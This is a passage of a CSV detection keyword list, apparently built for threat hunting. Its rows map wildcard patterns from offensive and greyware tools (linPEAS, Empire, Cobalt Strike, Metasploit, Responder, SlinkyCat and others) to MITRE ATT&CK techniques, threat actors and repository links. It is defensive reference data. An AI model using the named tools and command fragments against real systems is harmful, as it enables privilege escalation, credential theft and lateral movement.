TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*LinkedInt*","offensive_tool_keyword","LinkedInt","LinkedInt: A LinkedIn scraper for reconnaissance during adversary simulation","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/mdsecactivebreach/LinkedInt","1","0","N/A","N/A","5","463","112","2023-05-23T23:34:22Z","2017-07-12T12:58:47Z" +"*linpeas_builder.py*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - 
T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_darwin_amd64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_darwin_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_darwin_arm64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_darwin_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" 
+"*linpeas_fat.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_linux_386*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_linux_386*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_linux_amd64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_linux_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_linux_arm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linpeas_linux_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linux_hostrecon*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*linux_hostrecon.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Linux_LPE_eBPF_CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*linux_sudo_cve-2017-1000367.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*linux_trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*LinuxARMLELF32.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*linux-exploit-suggester*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - 
T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*linux-exploit-suggester*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*linux-exploit-suggester.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linuxprivchecker*","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. 
clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","N/A","N/A","10","1344","483","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z" +"*linuxprivchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*linux-rds-exploit.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*linux-smart-enumeration.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*linux-smart-enumeration-master*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - 
T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*linWinPwn-*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*linWinPwn.*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lion2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lion2john-alt.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*LiquidSnake.exe*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*list_backdoors*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*List_Privileges /Process:powershell*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*list_tcppivot*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*list_tokens -u*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" +"*ListAccountsWithSPN*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListAllUsers.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 
- T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*ListDescriptionContainsPass*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListDomainAdmins*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListDomainGroupsLocalAdmin*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*listen(58082* '0.0.0.0'*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*listen_http 0.0.0.0 8080 *.php operation1*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*ListMetasploitPayloads*","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ListNeverLoggedInAccounts*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD 
enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListPasswordNeverExpire*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListUsersLastPasswordChange*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListUsersNoPasswordRequired*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListUsersPasswordMustChange*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*ListUsersPasswordNotChanged*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*litefuzz -lk -c*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and 
servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*litefuzz -s -a *","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*litefuzz* -l -c*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*litefuzz.py *","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*litefuzz\fuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*lkarlslund/Adalanche*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*lklekjodgannjcccdlbicoamibgbdnmi*","greyware_tool_keyword","Anonymous Proxy Vpn Browser","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*llbhddikeonkpbhpncnhialfbpnilcnc*","greyware_tool_keyword","ProxyFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*llehsrewop*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed powershell","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*-llmnr -spn '*cifs* -secrets*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*LLMNR.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*LLMNRSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*llsrpc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
